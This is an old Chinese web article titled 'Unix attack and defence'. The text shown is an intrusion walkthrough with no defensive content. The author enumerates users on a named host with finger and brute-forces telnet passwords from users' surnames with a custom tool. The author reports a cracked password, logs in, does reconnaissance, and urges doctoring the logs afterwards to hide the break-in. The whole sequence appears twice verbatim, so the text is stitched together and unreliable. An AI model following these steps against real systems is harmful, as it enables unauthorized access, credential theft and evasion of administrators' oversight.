站内搜索
分类列表
本类阅读排行
本类推荐文章
广告
Unix系统攻击和防范
作者: 来源: 点击: 日期:2007-11-16 8:36:53
finger上场!
bash$ finger @202.202.0.8
[202.202.0.8 ]
LoginNameTTYIdleWhenWhere
daemon??? < . . . . >
bin ??? < . . . . >
sys ??? < . . . . >
walterWalter Wan pts/0202.202.0.114
dennisDennis Lee437 888wnet.net
power Power Xiong0202.202.0.10
dealH Wang pts/2202.202.0.11
admin ???< . . . . >
jessicaJessica Xiaopts/0202.202.0.9
smithSmith Liu pts/0202.202.0.13
render Renderpts/0202.103.10.117
ftp ???< . . . . >
好!我需要的Name出来了,赶快保存:
bash$ finger @202.202.0.8 >> /home/crossbow/name.lst
bash$ more /home/crossbow/name.lst
[202.202.0.8 ]
LoginNameTTYIdleWhenWhere
daemon ???< . . . . >
bin???< . . . . >
sys???< . . . . >
walterWalter Wanpts/0 202.202.0.114
dennisDennis Lee 437888wnet.net
powerPower Xiong0 202.202.0.10
dealH Wang pts/2202.202.0.11
admin???pts/0< . . . . >
jessicaJessica Xiao pts/0202.202.0.9
smith Smith Liu pts/0202.202.0.13
renderRender Chen0202.103.10.117
ftp???< . . . . >
由于很多人都用自己的姓名及变体作密码,我们就用他们的用户名、姓、和数字的各种组合试一试,成功率应该不低。这里我用一个我自己用C写的程序――got!来跑吧。got!它自己会用用户的姓、名和0-9数字的各种组合来尝试模拟 telnet登陆,省时省力。不过这种暴力破解法会在目标机的日志上留下痕迹。因此后面进去后一定记得把日志“加工”一下。它的用法是:got! -n 用户的姓 目标机器 用户名,你也可以用-f来指定字典文件暴力穷举。
bash$ got! -n wan 202.202.0.8 walter
Attempting...
N分钟以后……
Failed!
bash$
见鬼!失败了一个,再试下一个:
bash$ got! -n lee 202.202.0.8 dennis
Attempting...
Failed!
bash$
再次失败,已经浪费了不少时间了!“失败是成功之母”,不要灰心,接着来:
bash$ got! -n xiong 202.202.0.8 Power
Attempting...
Bingo!!!
The password of user 'power' is 'xiong99'! Good luck!
bash$
哈哈,得手了!终于搞到一个账户了――用户名:power;密码:xiong99。赶快用telnet吧!
bash$ telnet 202.202.0.8
SunOS 5.6
login:power
password:
Last login: Sun Dec 2 13:21:55 CDT 2001 from
202.202.0.10
Sun Microsystems Inc. SunOS 5.6
You have mail.
进来了!这个用户不久前还登陆过嘛!不过千万不要看mail,先看看现在有几个人:
$ w
13:07pm up 61 day(s), 3 users, …………
User tty login@ idle JCPU PCPU what
root pts/0 11:49am tail -f syslog
smith pts/5 12:13pmls -l *.c
power pts/7 13:07pm w
乖乖,管理员正在检查日志!可得小心点!看看这台Sun的版本细节:
$ uname -a
SunOS dev01 5.6 Generic_105181-19 sun4u sparc SUNW,Ultra-5_10
再看看这个用户的环境设置:
$ set
HOME=/export/home/power
HZ=100
IFS=
LOGNAME=power
MAIL=/var/mail/power
MAILCHECK=600
OPTIND=1
PATH=/usr/bin:
PS1=$
PS2=>
SHELL=/bin/sh
TERM=ansi
TZ=China
再看看有没有gcc,没有这玩艺,那就……
$ gcc
gcc: No input files.
不错,编译器还“健在”,没被删掉。
bash$ finger @202.202.0.8
[202.202.0.8 ]
LoginNameTTYIdleWhenWhere
daemon??? < . . . . >
bin ??? < . . . . >
sys ??? < . . . . >
walterWalter Wan pts/0202.202.0.114
dennisDennis Lee437 888wnet.net
power Power Xiong0202.202.0.10
dealH Wang pts/2202.202.0.11
admin ???< . . . . >
jessicaJessica Xiaopts/0202.202.0.9
smithSmith Liu pts/0202.202.0.13
render Renderpts/0202.103.10.117
ftp ???< . . . . >
好!我需要的Name出来了,赶快保存:
bash$ finger @202.202.0.8 >> /home/crossbow/name.lst
bash$ more /home/crossbow/name.lst
[202.202.0.8 ]
LoginNameTTYIdleWhenWhere
daemon ???< . . . . >
bin???< . . . . >
sys???< . . . . >
walterWalter Wanpts/0 202.202.0.114
dennisDennis Lee 437888wnet.net
powerPower Xiong0 202.202.0.10
dealH Wang pts/2202.202.0.11
admin???pts/0< . . . . >
jessicaJessica Xiao pts/0202.202.0.9
smith Smith Liu pts/0202.202.0.13
renderRender Chen0202.103.10.117
ftp???< . . . . >
由于很多人都用自己的姓名及变体作密码,我们就用他们的用户名、姓、和数字的各种组合试一试,成功率应该不低。这里我用一个我自己用C写的程序――got!来跑吧。got!它自己会用用户的姓、名和0-9数字的各种组合来尝试模拟 telnet登陆,省时省力。不过这种暴力破解法会在目标机的日志上留下痕迹。因此后面进去后一定记得把日志“加工”一下。它的用法是:got! -n 用户的姓 目标机器 用户名,你也可以用-f来指定字典文件暴力穷举。
bash$ got! -n wan 202.202.0.8 walter
Attempting...
N分钟以后……
Failed!
bash$
见鬼!失败了一个,再试下一个:
bash$ got! -n lee 202.202.0.8 dennis
Attempting...
Failed!
bash$
再次失败,已经浪费了不少时间了!“失败是成功之母”,不要灰心,接着来:
bash$ got! -n xiong 202.202.0.8 Power
Attempting...
Bingo!!!
The password of user 'power' is 'xiong99'! Good luck!
bash$
哈哈,得手了!终于搞到一个账户了――用户名:power;密码:xiong99。赶快用telnet吧!
bash$ telnet 202.202.0.8
SunOS 5.6
login:power
password:
Last login: Sun Dec 2 13:21:55 CDT 2001 from
202.202.0.10
Sun Microsystems Inc. SunOS 5.6
You have mail.
进来了!这个用户不久前还登陆过嘛!不过千万不要看mail,先看看现在有几个人:
$ w
13:07pm up 61 day(s), 3 users, …………
User tty login@ idle JCPU PCPU what
root pts/0 11:49am tail -f syslog
smith pts/5 12:13pmls -l *.c
power pts/7 13:07pm w
乖乖,管理员正在检查日志!可得小心点!看看这台Sun的版本细节:
$ uname -a
SunOS dev01 5.6 Generic_105181-19 sun4u sparc SUNW,Ultra-5_10
再看看这个用户的环境设置:
$ set
HOME=/export/home/power
HZ=100
IFS=
LOGNAME=power
MAIL=/var/mail/power
MAILCHECK=600
OPTIND=1
PATH=/usr/bin:
PS1=$
PS2=>
SHELL=/bin/sh
TERM=ansi
TZ=China
再看看有没有gcc,没有这玩艺,那就……
$ gcc
gcc: No input files.
不错,编译器还“健在”,没被删掉。
Unix系统攻击和防范 评论